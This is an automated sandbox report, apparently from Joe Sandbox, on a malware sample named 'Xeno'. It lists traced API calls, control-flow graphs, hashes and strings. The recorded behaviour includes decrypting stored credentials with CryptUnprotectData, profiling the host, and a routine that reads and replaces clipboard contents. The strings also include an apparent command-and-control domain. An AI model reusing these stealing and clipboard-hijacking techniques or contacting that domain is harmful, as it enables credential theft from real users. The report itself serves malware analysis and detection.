43e7c0 LdrInitializeThunk 14059->14088 14061->14058 14089 4273e0 14062->14089 14080->14029 14081->14027 14083 441a00 14082->14083 14084 441afe 14083->14084 14086 43e7c0 LdrInitializeThunk 14083->14086 14084->14047 14086->14084 14087->14054 14088->14061 14090 427420 14089->14090 14090->14090 14095 43d0f0 14090->14095 14093 43d340 LdrInitializeThunk 14094 4274a2 14093->14094 14096 43d10e 14095->14096 14097 43d12e 14095->14097 14096->14097 14105 43e7c0 LdrInitializeThunk 14096->14105 14098 427469 14097->14098 14100 43d0a0 RtlAllocateHeap 14097->14100 14098->14093 14102 43d1b7 14100->14102 14101 43d0c0 RtlFreeHeap 14101->14098 14104 43d1ee 14102->14104 14106 43e7c0 LdrInitializeThunk 14102->14106 14104->14101 14105->14097 14106->14104 14112 41fb10 14113 41fb1e 14112->14113 14117 41fb70 14112->14117 14118 41fc30 14113->14118 14115 41fbec 14116 41e140 LdrInitializeThunk 14115->14116 14115->14117 14116->14117 14119 41fc40 14118->14119 14120 4419e0 LdrInitializeThunk 14119->14120 14121 41fd0f 14120->14121 13837 4351d0 13838 4351fe GetSystemMetrics GetSystemMetrics 13837->13838 13839 435241 SelectObject 13838->13839 13841 43530d SelectObject 13839->13841 13842 43532a 13841->13842 13843 439dd0 13846 439df5 13843->13846 13844 439f72 13847 439e38 13846->13847 13852 43e7c0 LdrInitializeThunk 13846->13852 13847->13844 13849 439eca 13847->13849 13851 43e7c0 LdrInitializeThunk 13847->13851 13849->13844 13853 43e7c0 LdrInitializeThunk 13849->13853 13851->13847 13852->13846 13853->13849 14122 40d113 14123 40d136 14122->14123 14124 40d11d 14122->14124 14124->14123 14126 43e7c0 LdrInitializeThunk 14124->14126 14126->14123 14127 440b90 14128 440bb0 14127->14128 14129 440c7a 14128->14129 14137 43e7c0 LdrInitializeThunk 14128->14137 14131 43d0a0 RtlAllocateHeap 14129->14131 14134 440e6d 14129->14134 14132 440ce6 14131->14132 14136 440daa 14132->14136 14138 43e7c0 LdrInitializeThunk 14132->14138 14133 43d0c0 RtlFreeHeap 14133->14134 14136->14133 14137->14129 14138->14136 14139 42d19a 14140 42d1a5 14139->14140 14141 42d26e GetPhysicallyInstalledSystemMemory 14140->14141 14142 42d2b0 14141->14142 14142->14142 14143 43ee9a 14144 43eeb6 14143->14144 14146 43eece 14143->14146 14144->14146 14147 43e7c0 LdrInitializeThunk 14144->14147 14147->14146 13866 409a5d 13867 409a80 13866->13867 13867->13867 13868 409b09 LoadLibraryExW 13867->13868 13869 409b1a 13868->13869 13870 40d363 13874 4093e0 13870->13874 13872 40d36f CoUninitialize 13873 40d390 13872->13873 13875 4093f4 13874->13875 13875->13872 13876 441be0 13877 441c1f 13876->13877 13878 441bf9 13876->13878 13878->13877 13882 43e7c0 LdrInitializeThunk 13878->13882 13880 441c48 13880->13877 13883 43e7c0 LdrInitializeThunk 13880->13883 13882->13880 13883->13877 13884 3271000 13885 3271102 13884->13885 13886 3271012 13884->13886 13887 3271030 Sleep 13886->13887 13888 327103a OpenClipboard 13886->13888 13887->13886 13889 327104a GetClipboardData 13888->13889 13890 32710f9 GetClipboardSequenceNumber 13888->13890 13891 32710f3 CloseClipboard 13889->13891 13892 327105a GlobalLock 13889->13892 13890->13886 13891->13890 13892->13891 13893 327106b 13892->13893 13893->13893 13894 327108d GlobalAlloc 13893->13894 13895 327109d GlobalLock 13894->13895 13896 32710e9 GlobalUnlock 13894->13896 13897 32710b0 13895->13897 13896->13891 13898 32710b9 GlobalUnlock 13897->13898 13899 32710e0 GlobalFree 13898->13899 13900 32710cb EmptyClipboard SetClipboardData 13898->13900 13899->13896 13900->13896 13900->13899 14163 40d82c 14164 40d832 14163->14164 14167 411900 14164->14167 14166 40d83b 14169 411a16 14167->14169 14168 411a20 14168->14166 14169->14168 14170 413457 CreateThread 14169->14170 14171 4120f8 RtlExpandEnvironmentStrings 14169->14171 14172 4123ab RtlExpandEnvironmentStrings 14169->14172 14173 43e7c0 LdrInitializeThunk 14169->14173 14174 43d0c0 RtlFreeHeap 14169->14174 14177 441700 14169->14177 14181 441cd0 14169->14181 14170->14169 14190 421420 14170->14190 14171->14169 14172->14169 14173->14169 14174->14169 14179 441720 14177->14179 14178 44180e 14178->14169 14179->14178 14187 43e7c0 LdrInitializeThunk 14179->14187 14182 441d0f 14181->14182 14183 441ce9 14181->14183 14182->14169 14183->14182 14188 43e7c0 LdrInitializeThunk 14183->14188 14185 441d38 14185->14182 14189 43e7c0 LdrInitializeThunk 14185->14189 14187->14178 14188->14185 14189->14182 14191 42145c 14190->14191 14192 4308ad CoSetProxyBlanket 14193 42e4ac 14194 42e4b8 GetComputerNameExA 14193->14194 13901 408570 13903 40857f 13901->13903 13902 4087d7 ExitProcess 13903->13902 13904 4087c9 13903->13904 13905 408594 GetCurrentProcessId GetCurrentThreadId 13903->13905 13917 43e720 13904->13917 13906 4085b9 13905->13906 13907 4085bd SHGetSpecialFolderPathW GetForegroundWindow 13905->13907 13906->13907 13909 408667 13907->13909 13909->13909 13910 43d0a0 RtlAllocateHeap 13909->13910 13911 40873f 13910->13911 13912 4087c0 13911->13912 13916 40c6e0 CoInitializeEx 13911->13916 13912->13904 13920 43fdd0 13917->13920 13919 43e725 FreeLibrary 13919->13902 13921 43fdd9 13920->13921 13921->13919 13922 43d0f0 13923 43d10e 13922->13923 13924 43d12e 13922->13924 13923->13924 13932 43e7c0 LdrInitializeThunk 13923->13932 13925 43d309 13924->13925 13927 43d0a0 RtlAllocateHeap 13924->13927 13929 43d1b7 13927->13929 13928 43d0c0 RtlFreeHeap 13928->13925 13931 43d1ee 13929->13931 13933 43e7c0 LdrInitializeThunk 13929->13933 13931->13928 13932->13924 13933->13931 14196 40c733 CoInitializeSecurity CoInitializeSecurity 14197 440ab0 14199 440ad0 14197->14199 14198 440b5f 14199->14198 14201 43e7c0 LdrInitializeThunk 14199->14201 14201->14198 14202 438236 14204 43824e 14202->14204 14203 438263 GetUserDefaultUILanguage 14205 43828c 14203->14205 14204->14203 13939 43f075 13941 43ef2f 13939->13941 13940 43f13b 13941->13939 13941->13940 13943 43e7c0 LdrInitializeThunk 13941->13943 13943->13941 14206 40e136 14207 40e160 14206->14207 14210 439fe0 14207->14210 14209 40e291 14209->14209 14211 43a020 CoCreateInstance 14210->14211 14213 43a352 SysAllocString 14211->14213 14214 43a887 14211->14214 14217 43a3e3 14213->14217 14216 43a897 GetVolumeInformationW 14214->14216 14224 43a8b2 14216->14224 14218 43a876 SysFreeString 14217->14218 14219 43a3eb CoSetProxyBlanket 14217->14219 14218->14214 14220 43a40b SysAllocString 14219->14220 14221 43a86c 14219->14221 14223 43a4e0 14220->14223 14221->14218 14223->14223 14225 43a4f6 SysAllocString 14223->14225 14224->14209 14228 43a524 14225->14228 14226 43a850 SysFreeString SysFreeString 14226->14221 14227 43a846 14227->14226 14228->14226 14228->14227 14229 43a56f VariantInit 14228->14229 14231 43a5c0 14229->14231 14230 43a835 VariantClear 14230->14227 14231->14230 14232 43f3bc 14233 43f3c6 14232->14233 14234 43f3de 14232->14234 14233->14234 14239 43e7c0 LdrInitializeThunk 14233->14239 14236 43f42e 14234->14236 14238 43e7c0 LdrInitializeThunk 14234->14238 14238->14236 14239->14234

                            Executed Functions

                            Function 004351D0 Relevance: 43.9, APIs: 4, Strings: 21, Instructions: 156COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 4351d0-4352a3 GetSystemMetrics * 2 6 4352aa-4355e9 SelectObject * 2 0->6
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: MetricsObjectSelectSystem
                            • String ID: $0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$C[C$FZC$N\C$WVC$VC
                            • API String ID: 34426039-2778685088
                            • Opcode ID: c6127f7c9a7db46ddcd5acb7facf3fdfd5e3f223cce4bf4a7d6d21d36c9f5c7d
                            • Instruction ID: 37510dccdf2992e2c9b29f1aa8d032c624b90efb5f61db50743147bc3c231a18
                            • Opcode Fuzzy Hash: c6127f7c9a7db46ddcd5acb7facf3fdfd5e3f223cce4bf4a7d6d21d36c9f5c7d
                            • Instruction Fuzzy Hash: BA914BB040E3888FE360DF25D59978ABBE0BB85708F408D1EE5C86B350D7B95549CF9A
                            Function 00439FE0 Relevance: 32.3, APIs: 11, Strings: 7, Instructions: 802memorycomCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 9 439fe0-43a011 10 43a020-43a03d 9->10 10->10 11 43a03f-43a04e 10->11 12 43a050-43a07f 11->12 12->12 13 43a081-43a0bf 12->13 14 43a0c0-43a10a 13->14 14->14 15 43a10c-43a128 14->15 17 43a12e-43a137 15->17 18 43a1cc-43a1d7 15->18 19 43a140-43a168 17->19 20 43a1e0-43a218 18->20 19->19 21 43a16a-43a182 19->21 20->20 22 43a21a-43a271 20->22 23 43a190-43a1bd 21->23 24 43a280-43a294 22->24 23->23 25 43a1bf-43a1c4 23->25 24->24 26 43a296-43a2e4 24->26 25->18 27 43a2f0-43a304 26->27 27->27 28 43a306-43a34c CoCreateInstance 27->28 29 43a352-43a383 28->29 30 43a887-43a8b0 call 440310 GetVolumeInformationW 28->30 31 43a390-43a3b8 29->31 35 43a8b2-43a8b6 30->35 36 43a8ba-43a8bc 30->36 31->31 33 43a3ba-43a3e5 SysAllocString 31->33 41 43a876-43a883 SysFreeString 33->41 42 43a3eb-43a405 CoSetProxyBlanket 33->42 35->36 38 43a8d9-43a8e0 36->38 39 43a8e2-43a8e9 38->39 40 43a8ec-43a8fb 38->40 39->40 43 43a900-43a926 40->43 41->30 44 43a40b-43a429 42->44 45 43a86c-43a872 42->45 43->43 46 43a928-43a958 43->46 47 43a430-43a466 44->47 45->41 48 43a960-43a972 46->48 47->47 49 43a468-43a4df SysAllocString 47->49 48->48 50 43a974-43a99d call 41c5a0 48->50 51 43a4e0-43a4f4 49->51 55 43a9a0-43a9ab 50->55 51->51 53 43a4f6-43a52d SysAllocString 51->53 58 43a533-43a555 53->58 59 43a850-43a868 SysFreeString * 2 53->59 55->55 57 43a9ad-43a9b9 55->57 60 43a8c0-43a8d3 57->60 61 43a9bf-43a9cf call 407ef0 57->61 65 43a846-43a84c 58->65 66 43a55b-43a55e 58->66 59->45 60->38 62 43a9d4-43a9db 60->62 61->60 65->59 66->65 68 43a564-43a569 66->68 68->65 69 43a56f-43a5ba VariantInit 68->69 70 43a5c0-43a5de 69->70 70->70 71 43a5e0-43a5ee 70->71 72 43a5f2-43a5f4 71->72 73 43a835-43a842 VariantClear 72->73 74 43a5fa-43a603 72->74 73->65 74->73 75 43a609-43a616 74->75 76 43a618-43a61f 75->76 77 43a65d-43a65f 75->77 79 43a63c-43a640 76->79 78 43a661-43a679 call 407e70 77->78 88 43a67f-43a68b 78->88 89 43a7dd-43a7ee 78->89 81 43a642-43a64b 79->81 82 43a630 79->82 85 43a652-43a656 81->85 86 43a64d-43a650 81->86 84 43a631-43a63a 82->84 84->78 84->79 85->84 87 43a658-43a65b 85->87 86->84 87->84 88->89 90 43a691-43a699 88->90 91 43a7f0 89->91 92 43a7f5-43a80b 89->92 93 43a6a0-43a6aa 90->93 91->92 94 43a812-43a832 call 407ea0 call 407e80 92->94 95 43a80d 92->95 96 43a6c0-43a6c6 93->96 97 43a6ac-43a6b1 93->97 94->73 95->94 100 43a6e7-43a6f5 96->100 101 43a6c8-43a6cb 96->101 99 43a780-43a786 97->99 103 43a788-43a78e 99->103 105 43a6fb-43a6fe 100->105 106 43a79a-43a7a2 100->106 101->100 104 43a6cd-43a6e2 101->104 103->89 109 43a790-43a792 103->109 104->99 105->106 112 43a704-43a779 105->112 110 43a7a4-43a7a6 106->110 111 43a7a8-43a7ab 106->111 109->93 113 43a798 109->113 110->103 114 43a7d9-43a7db 111->114 115 43a7ad-43a7d7 111->115 112->99 113->89 114->99 115->99
                            APIs
                            • CoCreateInstance.OLE32(8123,00000000,00000001,6E696866,00000000), ref: 0043A344
                            • SysAllocString.OLEAUT32(FB35F90A), ref: 0043A3BF
                            • CoSetProxyBlanket.COMBASE(7C0014E6,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A3FD
                            • SysAllocString.OLEAUT32(BA74C46C), ref: 0043A46D
                            • SysAllocString.OLEAUT32(20EE22FA), ref: 0043A4FB
                            • VariantInit.OLEAUT32(?), ref: 0043A577
                            • SysFreeString.OLEAUT32(?), ref: 0043A85D
                            • SysFreeString.OLEAUT32(?), ref: 0043A866
                            • SysFreeString.OLEAUT32(00000000), ref: 0043A877
                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043A8AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
                            • String ID: -+$8123$?<="$RF$[7c1$fhin$><
                            • API String ID: 2247799857-3939988329
                            • Opcode ID: cc43a5e8769069c2abc748004715bf8a30ae397afc363c7177e75218d5b14933
                            • Instruction ID: f7c8668c6c170ee04320f3cb6f32d1bae6488c369456c635581b34e5eb8f4306
                            • Opcode Fuzzy Hash: cc43a5e8769069c2abc748004715bf8a30ae397afc363c7177e75218d5b14933
                            • Instruction Fuzzy Hash: 7D42DE756483409BD314CF28C88179BBBE5EBDA314F18892DE4D88B391D779D806CB97
                            Function 00433A7F Relevance: 30.1, Strings: 24, Instructions: 138COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 116 433a7f-433b9d 117 433b9f-433ba2 116->117 118 433ba4-433c16 117->118 119 433c18-433c58 117->119 118->117 120 433c5a-433c5d 119->120 121 433c83-433cfc call 409890 * 2 120->121 122 433c5f-433c81 120->122 128 433d06-433d34 121->128 122->120
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: $"$$$&$($*$,$.$6$8$9$:$<$>$P$R$T$V$f$h$i$j$l$n
                            • API String ID: 0-3154370701
                            • Opcode ID: f29e427968f2698b34fade096516cde7f0b83e21bb67be7bc55876a38738c241
                            • Instruction ID: 8bc486cfdb77a11598ff77e935415ce7041ec80f5835c8c55f7d3a8c14c5f753
                            • Opcode Fuzzy Hash: f29e427968f2698b34fade096516cde7f0b83e21bb67be7bc55876a38738c241
                            • Instruction Fuzzy Hash: 5671492150D7C18AE336CB38885879FBFD16BA6224F084B9EE4E95B3C2C7B94505C767
                            Function 00411900 Relevance: 23.3, APIs: 3, Strings: 9, Instructions: 2252COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: $ $@$M$`$c$k$l$n
                            • API String ID: 0-1497278038
                            • Opcode ID: 6ce7881244ee3f3c6d83cd5758f682a7359dd4535b671493cc5648675134ef53
                            • Instruction ID: e46d7091698a58886afb1e4fac79fefe2b8030fbae7e861d81af1935b7471b64
                            • Opcode Fuzzy Hash: 6ce7881244ee3f3c6d83cd5758f682a7359dd4535b671493cc5648675134ef53
                            • Instruction Fuzzy Hash: 2A1323719083908FCB14DF38C94539EBFF1AB56320F1986AED4A99B3D2D3388945CB56
                            Function 03271000 Relevance: 19.6, APIs: 13, Instructions: 81clipboardsleepmemoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • Sleep.KERNELBASE(00000001), ref: 03271032
                            • OpenClipboard.USER32(00000000), ref: 0327103C
                            • GetClipboardData.USER32(0000000D), ref: 0327104C
                            • GlobalLock.KERNEL32(00000000), ref: 0327105D
                            • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 03271090
                            • GlobalLock.KERNEL32 ref: 032710A0
                            • GlobalUnlock.KERNEL32 ref: 032710C1
                            • EmptyClipboard.USER32 ref: 032710CB
                            • SetClipboardData.USER32(0000000D), ref: 032710D6
                            • GlobalFree.KERNEL32 ref: 032710E3
                            • GlobalUnlock.KERNEL32(?), ref: 032710ED
                            • CloseClipboard.USER32 ref: 032710F3
                            • GetClipboardSequenceNumber.USER32 ref: 032710F9
                            Memory Dump Source
                            • Source File: 00000001.00000002.2943213934.0000000003271000.00000020.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: true
                            • Associated: 00000001.00000002.2943200800.0000000003270000.00000002.00000800.00020000.00000000.sdmpDownload File
                            • Associated: 00000001.00000002.2943225685.0000000003272000.00000002.00000800.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_3270000_Xeno.jbxd
                            Similarity
                            • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                            • String ID:
                            • API String ID: 1416286485-0
                            • Opcode ID: 2726ed36bf27a58687548f9cffe08c55d112116dc5efecfb79682deda04e8f26
                            • Instruction ID: 5e3cc20b861b6d2ac3c4071c97eb09f4c97daecbe06001ccb60155c2deef2a7d
                            • Opcode Fuzzy Hash: 2726ed36bf27a58687548f9cffe08c55d112116dc5efecfb79682deda04e8f26
                            • Instruction Fuzzy Hash: 92218631614351DBD7207B72BC0DB6AB7ECFF04751F088868F945D6155E7719850C7A1
                            Function 00414B68 Relevance: 14.9, APIs: 1, Strings: 7, Instructions: 912COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 584 414b68-414b96 call 407e80 call 441b50 589 414bd1-414bd9 584->589 590 414be2-414bfa call 401000 584->590 591 414b9d-414bca call 407e70 call 441be0 584->591 592 414c0c-414c14 584->592 589->590 590->592 591->589 591->590 594 414c16-414c25 592->594 595 414c5b-414cb7 call 401a20 592->595 598 414c30-414c37 594->598 605 414cc0-414ce5 595->605 601 414c40-414c47 598->601 602 414c39-414c3c 598->602 601->595 607 414c49-414c58 call 43e7c0 601->607 602->598 606 414c3e 602->606 605->605 609 414ce7-414cfc call 401d40 605->609 606->595 607->595 614 415041-41504a call 407e80 609->614 615 415080-415099 call 440310 609->615 616 4150b3-415118 609->616 617 414d03-414d07 609->617 618 415053 609->618 619 4150a5-4150b1 call 407e80 609->619 620 414eeb-414ef2 609->620 621 41505c-415075 call 440310 609->621 622 41509f 609->622 614->618 615->622 628 415120-415146 616->628 625 414d10-414d16 617->625 618->621 619->616 624 414f00-414f09 620->624 621->615 622->619 624->624 631 414f0b-414f12 624->631 625->625 632 414d18-414d29 625->632 628->628 635 415148-41515f call 401d40 628->635 637 414f14-414f19 631->637 638 414f1b 631->638 639 414d30 632->639 640 414d2b-414d2e 632->640 647 415324-41532b 635->647 648 415166-4151a8 635->648 649 41530a-41531d call 418700 635->649 643 414f1e-414f5b call 407e70 637->643 638->643 644 414d31-414d3d 639->644 640->639 640->644 658 414f60-414fb7 643->658 651 414d44 644->651 652 414d3f-414d42 644->652 661 415334-415336 647->661 653 4151b0-4151fe 648->653 649->647 665 4156ff 649->665 656 414d45-414d5f call 407e70 651->656 652->651 652->656 653->653 657 415200-41521f call 401d70 653->657 671 414d65-414d69 656->671 672 414e6f-414eae call 440310 656->672 657->661 675 415226-415257 657->675 658->658 664 414fb9-414fc9 658->664 662 41534a-415361 call 401d90 661->662 686 4156e0 662->686 687 4153a0-4153b6 call 401da0 662->687 688 415380-41538d 662->688 689 415340-415346 call 407e80 662->689 690 4156e2 662->690 691 415349 662->691 692 415368 662->692 693 4154ec-4154f7 662->693 694 4156cf-4156d4 662->694 695 415590-4155a8 call 401da0 662->695 696 415370-415374 662->696 697 415575-415582 call 407e80 662->697 698 415516-41556b call 41a860 662->698 699 4154dd-4154e5 662->699 669 414fe1-414ffc 664->669 670 414fcb-414fce 664->670 680 415703 665->680 678 415021-41503b call 4089e0 669->678 679 414ffe-415005 669->679 677 414fd0-414fdf 670->677 673 414d87-414ddd call 41b7e0 * 2 671->673 682 414eb3-414ee4 CryptUnprotectData 672->682 728 414d70 673->728 729 414ddf-414dfa call 41b7e0 673->729 685 415260-41528c 675->685 677->669 677->677 678->614 681 415010-41501f 679->681 680->680 681->678 681->681 682->614 682->615 682->616 682->618 682->619 682->620 682->621 682->622 682->648 685->685 704 41528e-415305 call 41a860 685->704 686->690 725 415410-415417 687->725 726 4153b8-4153bd 687->726 688->687 688->689 688->691 688->693 688->696 688->697 688->698 689->691 706 4156e6-4156fe call 401f00 690->706 691->662 692->696 709 415511 693->709 710 4154f9-4154ff 693->710 694->686 722 415610-41563a call 407e70 call 40a390 695->722 723 4155aa-4155af 695->723 696->688 697->695 698->697 699->688 699->689 699->691 699->693 699->696 699->697 699->698 704->706 709->698 719 415500-41550f 710->719 719->709 719->719 758 415641-415658 call 407e70 722->758 759 41563c 722->759 732 4155c9-4155cb 723->732 730 415419 725->730 731 41541e-41544e call 407e70 call 40a390 725->731 727 4153c9-4153cb 726->727 735 4153c0 727->735 736 4153cd-4153de 727->736 734 414d74-414d81 728->734 729->734 750 414e00-414e2f 729->750 730->731 761 415450 731->761 762 415455-415472 call 407e70 731->762 739 4155c0 732->739 740 4155cd-4155de 732->740 734->672 734->673 742 4153c1-4153c7 735->742 736->735 743 4153e0-4153f8 736->743 746 4155c1-4155c7 739->746 740->739 747 4155e0-4155f8 740->747 742->725 742->727 743->735 749 4153fa-415406 743->749 746->722 746->732 747->739 752 4155fa-415606 747->752 749->742 754 415408-41540b 749->754 750->734 755 414e35-414e4e call 41b7e0 750->755 752->746 757 415608-41560b 752->757 754->742 755->734 767 414e54-414e6a 755->767 757->746 769 415671-41567f 758->769 770 41565a-41565f 758->770 759->758 761->762 771 415491-41549f 762->771 772 415474-415479 762->772 767->734 774 415681-415688 769->774 775 4156b0 769->775 773 415660-41566f 770->773 779 4154c1-4154cf call 4419e0 771->779 780 4154a1-4154a6 771->780 778 415480-41548f 772->778 773->769 773->773 776 415690-41569f 774->776 777 4156b4-4156ca call 4419e0 775->777 776->776 781 4156a1 776->781 777->687 778->771 778->778 786 4154d4 779->786 783 4154b0-4154bf 780->783 781->777 783->779 783->783 786->699
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: &,&#$;$C?1*$N$p$v8*+$VA
                            • API String ID: 0-127065759
                            • Opcode ID: a1caf71b882f4878180087479312a2e2d355371028670d5d4e42b8ab7061173d
                            • Instruction ID: fd0f427f2008a2c0edfbd6141d10ccd6f3fdcb781c1167f549041c6f638f69ce
                            • Opcode Fuzzy Hash: a1caf71b882f4878180087479312a2e2d355371028670d5d4e42b8ab7061173d
                            • Instruction Fuzzy Hash: F45227B6A08740DFD7248F24D8517AB77E2EFD5314F18893EE49987351E7389881C786
                            Function 0040D363 Relevance: 13.8, APIs: 1, Strings: 8, Instructions: 310COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 787 40d363-40d38f call 4093e0 CoUninitialize 790 40d390-40d3b7 787->790 790->790 791 40d3b9-40d3d1 790->791 792 40d3e0-40d40d 791->792 792->792 793 40d40f-40d46f 792->793 794 40d470-40d488 793->794 794->794 795 40d48a-40d49b 794->795 796 40d4bb-40d4c3 795->796 797 40d49d-40d4ab 795->797 799 40d4c5-40d4ca 796->799 800 40d4dd 796->800 798 40d4b0-40d4b9 797->798 798->796 798->798 801 40d4d0-40d4d9 799->801 802 40d4e1-40d4eb 800->802 801->801 803 40d4db 801->803 804 40d50b-40d513 802->804 805 40d4ed-40d4f1 802->805 803->802 807 40d515-40d516 804->807 808 40d52b-40d535 804->808 806 40d500-40d509 805->806 806->804 806->806 809 40d520-40d529 807->809 810 40d537-40d53b 808->810 811 40d54b-40d557 808->811 809->808 809->809 812 40d540-40d549 810->812 813 40d571-40d695 811->813 814 40d559-40d55b 811->814 812->811 812->812 816 40d6a0-40d6cd 813->816 815 40d560-40d56d 814->815 815->815 817 40d56f 815->817 816->816 818 40d6cf-40d6e8 816->818 817->813 819 40d6f0-40d704 818->819 819->819 820 40d706-40d734 call 40b2e0 819->820 822 40d739-40d785 820->822
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: Uninitialize
                            • String ID: ,$@C$C]$IP$ZV$sobrattyeu.bond${A$QS
                            • API String ID: 3861434553-683654926
                            • Opcode ID: eb15df639867500a9facb8c81cb763dac1420069da39424e71037901060fffb5
                            • Instruction ID: 6a083f237194b953a348a5db904179e6b3350956d12e98a5709cea8039accc4e
                            • Opcode Fuzzy Hash: eb15df639867500a9facb8c81cb763dac1420069da39424e71037901060fffb5
                            • Instruction Fuzzy Hash: A8A1BE7050D3D18BD325CF29D4907EBBFE1AFE6304F28496ED4D95B286CB38450A8B96
                            Function 00408570 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 205threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 823 408570-408581 call 43e230 826 4087d7-4087d9 ExitProcess 823->826 827 408587-40858e call 437410 823->827 830 4087d2 call 43e720 827->830 831 408594-4085b7 GetCurrentProcessId GetCurrentThreadId 827->831 830->826 832 4085b9-4085bb 831->832 833 4085bd-408661 SHGetSpecialFolderPathW GetForegroundWindow 831->833 832->833 835 408667-408681 833->835 836 408709-408713 833->836 837 408683-408685 835->837 838 408687-408707 835->838 839 408720-408734 836->839 837->838 838->836 839->839 840 408736-408762 call 43d0a0 839->840 843 408770-408794 840->843 843->843 844 408796-4087b4 call 4098d0 843->844 847 4087c0-4087c7 844->847 848 4087b6 call 40c6e0 844->848 847->830 850 4087c9-4087cf call 407e80 847->850 851 4087bb call 40b2b0 848->851 850->830 851->847
                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00408594
                            • GetCurrentThreadId.KERNEL32 ref: 0040859D
                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408644
                            • GetForegroundWindow.USER32 ref: 00408659
                            • ExitProcess.KERNEL32 ref: 004087D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                            • String ID: `Abc
                            • API String ID: 4063528623-3897226799
                            • Opcode ID: 9e3a798af9976ded4a535906874f74240b22633e599025efaf28ccb3e8e8a28d
                            • Instruction ID: d19e78807b624985901526984c6b7ab3fbf55d5db797ab1e363f5c364b002356
                            • Opcode Fuzzy Hash: 9e3a798af9976ded4a535906874f74240b22633e599025efaf28ccb3e8e8a28d
                            • Instruction Fuzzy Hash: C7518D73A443084BD7086FB5CD46357BAD69BC4714F1ED03EA985EB3D2EE789C068688
                            Function 0042D19A Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 332COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
